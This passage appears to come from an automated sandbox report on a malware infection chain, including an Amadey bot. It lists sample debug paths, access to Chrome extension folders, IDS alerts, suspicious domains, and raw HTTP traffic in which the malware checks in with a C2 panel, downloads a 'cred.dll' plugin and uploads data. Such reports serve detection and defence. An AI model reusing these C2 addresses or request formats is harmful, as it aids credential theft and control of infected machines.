                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: A7F0.exe, 0000001F.00000002.646423634.0000000002E20000.00000040.00000001.sdmp, A7F0.exe, 0000001F.00000003.532814882.0000000003020000.00000004.00000001.sdmp
                          Source: Binary string: Windows.Storage.pdb- source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb| source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdbh source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.469360624.00000000032B0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467390023.00000000032B0000.00000004.00000001.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 1E7F.exe, 00000007.00000000.445613231.0000000000413000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.459447381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000C.00000002.500289269.0000000005440000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: cfgmgr32.pdbd source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbr source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: profapi.pdbn source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: 8C:\cuguzab xobu\17_dacop.pdbh source: zmbGUZTICp.exe, 00000000.00000002.350665384.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000000.00000000.345397545.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000001.00000000.348322388.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000000.436425867.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000002.443661421.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000006.00000000.440852957.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: JC:\konukuwe_nuyujobapuyozi\la.pdbh source: 309C.exe, 0000000B.00000000.462090834.0000000000401000.00000020.00020000.sdmp, tejjnepq.exe, 00000018.00000000.482700866.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: A7F0.exe, 0000001F.00000003.536533685.0000000003240000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.653154423.0000000003190000.00000040.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: A7F0.exe, 0000001F.00000003.536533685.0000000003240000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.653154423.0000000003190000.00000040.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\cuguzab xobu\17_dacop.pdb source: zmbGUZTICp.exe, zmbGUZTICp.exe, 00000000.00000002.350665384.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000000.00000000.345397545.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000001.00000000.348322388.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000000.436425867.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000002.443661421.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000006.00000000.440852957.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.467405426.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467933513.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467565394.00000000032B6000.00000004.00000001.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: C:\konukuwe_nuyujobapuyozi\la.pdb source: 309C.exe, 0000000B.00000000.462090834.0000000000401000.00000020.00020000.sdmp, tejjnepq.exe, 00000018.00000000.482700866.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 1E7F.exe, 00000007.00000000.445613231.0000000000413000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.459447381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000C.00000002.500289269.0000000005440000.00000002.00020000.sdmp
                          Source: Binary string: C:\zazadix dori\kol.pdbh source: 2DB3.exe, 00000008.00000000.453772125.0000000000401000.00000020.00020000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_004197F1 BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.6:49759 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49766 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.6:49767 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49771 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49773 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49774 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49777 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49779 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49780 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49784 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49785 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49787 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.6:49787 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49790 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49791 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49792 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49793 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49795 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49796 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49798 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49801 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49802 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49803 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49804 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.0 25
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----83d53270d11404365da7fce61041da17Host: 185.215.113.35Content-Length: 83837Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----83d53270d11404365da7fce61041da17Host: 185.215.113.35Content-Length: 83837Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 85Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
